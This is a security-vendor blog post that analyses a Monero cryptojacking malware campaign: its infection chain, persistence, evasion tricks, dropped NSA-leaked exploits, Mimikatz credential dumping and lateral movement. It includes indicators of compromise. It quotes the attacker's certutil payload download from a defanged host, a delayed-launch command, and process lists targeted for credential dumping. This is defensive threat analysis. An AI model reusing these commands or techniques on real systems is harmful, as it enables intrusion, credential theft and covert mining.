Cryptojacking: An Unwanted Guest

• We analyse a cryptojacking attack that mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. The rebound of the cryptocurrencies market means that cryptojacking is an increasingly profitable activity for criminals.
• The use of freely-available exploits such as EternalBlue and DoublePulsar shows how exploits that were previously only available to nation state actors are gradually adopted by less sophisticated cybercrime players.
• The use of Mimikatz, masscan and WinPcap also raises the question about the aims of the attackers beyond simply distributing coin mining malware.
• Historically, coin mining malware has been regarded as a low severity threat, but attacks such as this demonstrate how this threat category has become more nefarious. Coin miners have started using techniques used by banking Trojans to evade detection, such as living-off-the-land binaries (LOLBins) for code execution, parent process ID (PPID) spoofing, and hiding files and payloads after execution to remain discreet.

Background

The early adopters of cryptocurrencies like Bitcoin, Ethereum and Litecoin were privacy-conscious individuals and currency enthusiasts. Over time, however, the inherent pseudonymous properties of cryptocurrencies has attracted people with less noble intentions – those who wish to reduce the traceability of financial transactions associated with criminal activities. 

One of the fundamental requirements for cryptocurrencies is to verify the accuracy of each transaction’s details to ensure transactions remain secure and trustworthy. There is no concept of a managing authority in cryptocurrencies, and the job of verification is performed by a community of global users, often referred to as “miners”. The transaction details of cryptocurrencies like Bitcoin are publicly available. A collection of transaction records forms a unit called a “block”. After a transaction is verified, each block is assigned a unique code called a“hash” and the complete transaction record is compiled to form a blockchain ledger. The process of verifying and adding the transaction details back into the blockchain requires solving complex and computationally-intense hashing problems. In exchange for solving these problems, miners are awarded a certain number of cryptocurrencies. 

Solving the hashing problem takes substantial computing power, but can be sped up by using GPUs and specialist hardware called an ASIC (Application-Specific Integrated Circuit). ASICs are extremely costly and require considerable cooling effort, resulting in astronomical electricity bills for their owners. Without a doubt, cryptocurrency mining is a costly enterprise. 

Cryptojacking

Sponsorships Available

Sponsorships Available

Sponsorships Available

Covert mining using stolen resources is called “cryptojacking”. Coin miner malware can also be delivered through a variety of methods including malicious email attachments, hyperlinks, drive-by downloads, compromising common JavaScript libraries such as JQuery, and exploiting vulnerabilities in Internet-facing devices such as email and web servers. 

Attackers have also started using post-exploitation tools, enabling them to infect multiple computers by moving laterally within the compromised network. Cryptojacking activity tends to follow the value of cryptocurrencies. As the value of cryptocurrencies increases, cryptojacking becomes an increasingly profitable activity for criminals. It also has benefits over other means of generating revenue, such as ransomware: 

• Ransomware is typically a one-time activity, and most enterprises don’t honour demands for the ransom. 
• Ransomware attacks attract the attention of law enforcement agencies. 
• If third-party ransomware is used, developers typically take a cut of any ransom money that is paid. 
• The development of ransomware requires more skill than a coin miner. 
• Detecting a coin miner is difficult compared to most malware because mining software can be used legitimately. 
• Once a coin miner is deployed, an actor can monetise the infected host for as long as the host is online. 

Infection Chain

Recently we came across a URL delivering coin mining malware. The payload was isolated by Bromium Secure Platform and provided a lot of data for understanding how the attack works. In this blog post, we analyse its behaviour and how it uses a suite of post-exploitation tools, including EternalBlue, to extend the intrusion into the victim’s network. This wasn’t your typical coin mining malware. 

The malware mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. This appreciation is one possible reason why cryptojacking attacks are increasingly attractive to attackers. Monero, in particular, is favoured by criminal actors because it is less resource intensive to mine since it does not require an ASIC, unlike other cryptocurrencies. Ultimately, this means that attackers can target low-powered devices and still turn a profit. 

Figure 1 – Monero’s value in USD from December 2018 to June 2019 (source: CoinGecko.com)

Behavioral Analysis  

• Main dropper
• Filename: download.exe 
• Size: 90 KB (92160 bytes) 
• MD5: 0fe77bc5e76660ad45379204aa4d013c 
• SHA1: 189D75F6485B7F220B143C0DD548D97BD7D81E3F 
• SHA256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b 

This portable executable (PE) file is delivered through a URL. Looking at the sections of the file in PEStudio, suggests that it was packed using UPX, an open source packer. 

Figure 2 – UPX packed binary.

When run, download.exe unpacks itself and copies the unpacked file to “C:\WebKitsSdk\2.7.92” with the name ophgsf.exe. 

Figure 3 – File write event after download.exe is unpacked. 

The newly written file is then run as a child process of download.exe. 

Figure 4 – Download.exe launches process ophgsf.exe.

The process then copies itself to C:\Windows\SysWOW64 with the name tgvbgq.exe and marks it as a hidden file. 

Figure 5 – Process ophgsf.exe copies itself to another location then hides it.

To make the malware persistent on the system, ophgsf.exe creates and launches a new service called Abcdef where the BinaryPath points to C:\Windows\System32\tgvbgq.exe. Because the CreateService API is called from a 32-bit process, the service’s configuration is set to WOW64. When process ophgsf.exe calls StartService API to launch the binary registered as service, it launches the binary from C:\Windows\SysWOW64 directory instead of C:\Windows\System32\tgvbgq.exe that was provided in the binary path due to Wow64 redirection. The service is granted the following rights through the DesiredAccess parameter value (0xF0137):  

• STANDARD_RIGHTS_REQUIRED 
• SERVICE_CHANGE_CONFIG 
• SERVICE_QUERY_CONFIG 
• SERVICE_QUERY_STATUS 
• SERVICE_START 
• SERVICE_STOP 
• SERVICE_USER_DEFINED_CONTROL  

Figure 6 – Service creation to establish persistence.

Launching a binary through a Windows service is a popular technique for several reasons. First, it breaks process-chain based detection and second, upon the start of the service, the binary is always executed even though it is not a valid service executable. After starting the service, ophgsf.exe copies itself from C:\WebKitsSdk\2.7.92 to C:\Windows\SysWOW64 as “126860.bak” and then terminates itself. 

Figure 7 – Ophgsf.exe deletes its binary and creates a backup file.

A PE file called SunloglicySrv.exe is downloaded and run by download.exe from the URL hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and saved to C:\WebKitsSdk\2.7.92\. Bromium Cloud Service classifies this threat as Win32.Trojan.Miner. 

Figure 8 – HTTP GET request and response to download file SunloglicySrv.exe.

Figure 9 – Download.exe runs coin miner SunloglicySrv.exe.

After starting the coin miner process (SunloglicySrv.exe), download.exe then launches the certutil tool using command prompt (cmd.exe). Certutil is a Windows built-in tool used for managing digital certificates. The utility can also be used to download a file from a remote server. For example, by using the following command an attacker can download a file and save it locally: 

certutil.exe -urlcache -split -f [URL] DestinationFile 

In this case, the provided URL is hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and the destination file is %SystemRoot%\Temp\SunloglicySrv.exe. 

We see certutil being frequently misused as a LOLBin by malicious actors. One of the reasons why malware authors prefer to download a payload using certutil because using a signed Microsoft tool is less likely to be detected than using third party programs. If the download using certutil was successful, cmd.exe runs the file. We found that the file (SunloglicySrv.exe) was the same coin miner that was downloaded and launched earlier by download.exe. 

Figure 10 – Use of certutil to download a payload from a URL.

Afterwards, download.exe moves itself to the directory “%TEMP%\127172\….\” and saves the file with a name “TemporaryFile”. It then renames the directory “….” to “%TEMP%\127172\”. The reason for copying a file and then renaming a directory in this way is to break file tracking. The Windows file system doesn’t provide callbacks for files within the directory during a directory rename operation, and this technique allows malware authors bypass tracking of their binary by security solutions and makes the job of an auditor a whole lot harder. Finally, download.exe ends its process.

Figure 11 – Download.exe copies itself to the user’s %TEMP% directory.

SunloglicySrv.exe (Win32.Trojan.Mbt) 

The coin miner process is launched from C:\WebKitsSdk\2.7.92 and copies itself to C:\Windows\ugrpkute with the name tpcunli.exe. Once a copy is created, it follows the same technique of breaking file tracking by moving the file from C:\WebKitsSdk\2.7.92 to C:\Users\bruser1729\AppData\Local\Temp\127437\….\ using the file name “TemporaryFile”, before renaming the directory to C:\Users\bruser1729\AppData\Local\Temp\127437\. 

• Filename: tpcunli.exe  
• File Path: C:\Windows\ugrpkute 
• SHA256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81 
• Bromium Cloud Service classification: Win32.Trojan.Mbt 

Figure 12 – SunloglicySrv.exe copies itself to the user’s %TEMP% directory.

The process then runs tpcunli.exe from cmd.exe using the start command. It joins the command with a ping command that delays the launch of the program by five seconds. This is common way to delay the execution of commands. After running the command, SunloglicySrv.exe ends its process.

cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\tpcunli.exe 

tpcunli.exe (Win32.Trojan.Coinminer) 

The process begins by modifying itself with another payload. Afterwards, it creates a service called “plikeztuc” where BinaryPath points to C:\Windows\ugrpkute\tpcunli.exe and the DesiredAccess is 0xF0137. After creating the service, it ends its process. 

Figure 13 – Service creation to establish persistence.

tpcunli.exe (Win32.Trojan.Mbt) 

• Filename: tpcunli.exe  
• File Path: C:\Windows\ugrpkute 
• SHA256: 69481183822cbc5972843308746f1b32426c68375acd82ebe84f04930a4800ef 
• Bromium Cloud Service classification: Win32.Trojan.Mbt 

The process runs the cacls tool which is used modify access control lists (ACLs). Specifically, it deletes the permissions to access the /etc/hosts file for members of the users and administrators group and the system user. 

Figure 14 – Removal of access to /etc/hosts file.

The process also hides the current user’s Internet history and cookie files by changing their file properties and placing desktop.ini files in each subdirectory. 

Figure 15 – Hidden Internet history files.

Next, it runs netsh commands to block incoming Server Message Block (SMB) traffic. The command resembles those used by WannaCry, where it exploited an SMB version 1 vulnerability and applied similar IPSec policies to block TCP port 445. 

Figure 16 – Netsh commands to apply IPSec policy to block incoming SMB traffic.

The process drops various publicly available tools and exploits, such as those exposed by The Shadow Brokers in 2017. These tools were developed by National Security Agency’s Equation Group and have been used by several malware authors, including the creators of WannaCry.  

• EternalChampion
• EternalBlue 
• EquationDrug 
• EternalRomance 
• Smbtouch-Scanner
• DoublePulsar backdoor 
• WinPcap 
• Mimikatz 
• ProcDump 
• Exploit based on CVE-2017-8464 
• masscan 

Figure 17 – Dropping of post–exploitation tools, including Equation Group exploits.

Next tpcunli.exe installs WinPcap version 4.1.3 using silent mode flat (“/S”). The properties of this file show that it was taken from a product called BMC TrueSight installer.

Figure 18 – Silent installation of WinPcap.

Figure 19 – WinPcap.exe file properties.

The WinPcap installer attempts to stop the services of BMC TrueSight and restarts the Netgroup Packet Filter (NPF) driver. 

Figure 20 – WinPcap stops services of BMC software.

Tpcunli.exe runs masscan (bgichmvs.exe) through cmd.exe and uses it to scan for open ports of public IP ranges. Because masscan is dependent on the WinPcap driver (npf.sys), this likely explains why WinPcap was installed.  

Figure 21 – Port scanner scans subnet 222.186.0.1/24 for open TCP port 80 and generates output in JSON format.

Next tpcunli.exe writes a list of hardcoded public IP address ranges to a file called ip.txt. Afterwards it launches masscan and provides the list of IP ranges as input to scan for open TCP port 7001 at a rate of 4096 packets per seconds and write output in JSON format. We believe it does so to find exposed Oracle Weblogic servers that are listening on port 7001 that may be vulnerable to CVE-2017-10271. 

Figure 22 – List of hardcoded IP ranges.

Figure 23 – Masscan command scanning for TCP port 7001 in the IP ranges provided.

Next tpcunli.exe runs Mimikatz (vfshost.exe) to extract credentials lsass.exe (Local Security Authority Subsystem Service) process using its sekurlsa module. This module retrieves a password in plain text format, which can be used for further attacks using the pass–the–hash technique. If the command is running as Administrator then it requires debug privilege rights. 

Figure 24 – Dumping passwords using the sekurlsa module.

Figure 25 – Mimikatz command output saved in log.txt.

Tpcunli.exe copies itself to C:\Windows\IME using the file name masruql.exe. It then runs Windows Task Scheduler (schtasks.exe) to create two scheduled tasks. The first is called “qnsegabbm” which runs masruql.exe using the SYSTEM account and reoccurs every minute. The second is called “senutquec” which runs a command that modifies the user access rights of C:\Windows\ugrpkute\tpcunli.exe to allow everyone. This reoccurs every minute and uses the SYSTEM account.

Figure 26 – First scheduled task.

Figure 27 – Second scheduled task.

Afterwards, tpcunli.exe drops another payload (enakii.exe) and its configuration file in C:\Windows\temp\zceliqcqn. The configuration file matches that used by XMRig, a free Monero coin miner, suggesting that malware is based on that software. 

Payload Properties

• Filename: enakii.exe 
• Location: C:\Windows\temp\zceliqcqn 
• SHA256: 245dfbbdcee07be690fbed16eea528e2a0ed7ebd67c179515a479b0693810cc7 
• Bromium Cloud Service classification: Win32.Trojan.Coinminer 

Figure 28 – Configuration file of emakii.exe (XMRig Monero coin miner).

After dropping the payload, a third scheduled task is created called “kqivnbrqa”. It modifies the user access rights of C:\Windows\TEMP\zceliqcqn\enakii.exe to allow everyone. This task is set to reoccur every minute and is run using the SYSTEM account.

Figure 29 – Third scheduled task.

Tpcunli.exe performs a PPID spoofing technique to launch the child process enakii.exe. Using PPID spoofing, it indirectly executes C:\Windows\TEMP\zceliqcqn\enakii.exe by launching enakii.exe as a child process of C:\Windows\System32\Spoolsv.exe.  

One of the ways malware can perform PPID spoofing is to open handle on a target parent process, call UpdateProcThreadAttribute to update the attribute list in the STARTUPINFOA structure of child processes, and then change PROC_THREAD_ATTRIBUTE_PARENT_PROCESS with the handle of process target parent process. 

Figure 30 – Launch of emaki.exe via spoolsv.exe.

Tpcunli.exe also drops a tool (ouousbpro.exe) used to exploit CVE-2017-8464 by creating shortcut files (.LNK) for all non-existent drives. We believe it does this to spread to removable media and network drives. 

Figure 31 – CVE-2017-8464 exploit tool ouousbpro.exe.

Figure 32 – Creation of .LNK files for non-existent drives.

Figure 33 – Content of .LNK file FlashPlayer_K.lnk

If the process continues to run, it tries to exploit an existing vulnerability in the system to move laterally.   

Figure 34 – Process interaction graph viewed in Bromium Controller.

The graph below shows the chain of events captured in the micro VM, which includes the dropping of payloads, indirect execution of processes and high severity events triggered by known malware behavioural patterns.

Figure 35 – High severity events raised during the infection life cycle.

Interesting Memory Strings – tpcunli.exe 

In our analysis, we found that tpcunli.exe was very noisy and drops all of the post-exploitation tools on the system. Additional memory strings were identified that hint at what else this malware does:

• List of common passwords 
• List of file extensions 
• List of domain names 
• Commands to dump the process memory of certain processes using Procdump which are then fed into Mimikatz to extract credentials: 

csrss.exe
lsass.exe
lsm.exe
smss.exe
services.exe
wininit.exe
winlogon.exe
LogonUI.exe
rdpclip.exe
svchost.exe
explorer.exe

• Commands to disable Windows firewall, SharedAccess, Windows Defender services.

Figure 36 – Hardcoded commands in memory to disable Windows Defender, Firewall and SharedAccess.

• Fetch a configuration file cfg.ini from the following URLs:

hxxp://uio.hognoob[.]se:63145/cfg.ini
hxxp://uio.heroherohero[.]info:63145/cfg.ini

Figure 37 – Contents of configuration file cfg.ini.

• Use the following domain strings to download the coin miner payload:

hognoob|bulehero|heroherohero 

• Try to move laterally within the network using known credentials.

Figure 38 – Lateral movement using WMIC commands.

Threat Classifications

Figure 39 – Classification of dropped files by Bromium Cloud Service.

Indicators of Compromise (IOCs) 

The post Cryptojacking: An Unwanted Guest appeared first on Bromium.

Recent Articles By Author

• Ransomware Goes Fileless, Uses Malicious Documents and PowerShell to Encrypt Files
• Reawakening of Emotet: An Analysis of its JavaScript Downloader
• Agent Tesla: Evading EDR by Removing API Hooks

More from Ratnesh Pandey

*** This is a Security Bloggers Network syndicated blog from Bromium authored by Ratnesh Pandey. Read the original post at: https://www.bromium.com/cryptojacking-coin-miner-attack-uses-nsa-developed-equation-group-tools-to-move-laterally/